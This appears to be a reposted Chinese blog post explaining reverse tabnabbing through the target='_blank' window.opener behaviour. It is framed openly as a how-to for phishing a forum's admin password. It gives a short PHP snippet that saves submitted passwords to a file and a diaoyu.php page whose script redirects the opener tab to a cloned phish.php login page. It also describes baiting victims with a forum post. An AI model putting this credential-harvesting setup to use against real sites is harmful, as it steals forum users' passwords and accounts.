【奇技淫巧】看我如何在论坛进行钓鱼
2019-05-06 23:10:00 Author: mp.weixin.qq.com(查看原文) 阅读量:21 收藏

用户点击了某个网站中带有target=”_blank”属性的超链接后,浏览器会单独新建一个标签页来显示该链接所指向的内容。但是请注意,在这一瞬间,浏览器会允许新建的标签页通过一个名为“window.opener”的浏览器API来与之前的网页进行短暂通信。


比如我要钓鱼一个论坛的后台密码,我先把他的html保存下载,然后我添加几行代码,示例代码如下:
$content = $_POST['name']
file_put_contents('password.txt',$content);
打开以后是这样的


然后我再创建个diaoyu.php文件,事例代码如下:
<meta http-equiv="refresh" content="1;url="https://pan.baidu.com/s/1eRFAiUQ">
<script>
if(window.opener){
  window.opener.location  = "http://127.0.0.1/phish.php";
}
</script>

然后比如我发个帖,发完是这样的


点击以后是新开标签页是调到了百度盘,如图


但是刚刚的标签页跳到了phish.php页面,


然后不小心输入密码以后,


文章来源: http://mp.weixin.qq.com/s?__biz=MjM5MDkwNjA2Nw==&amp;mid=2650374608&amp;idx=2&amp;sn=0fade0c231d3e348da90f5807570d3e5&amp;chksm=beb0826c89c70b7a521e9f63858583776162f6b43b3ef0c0b049380c86e592e5cfc4459aa2fe#rd
如有侵权请联系:admin#unsafe.sh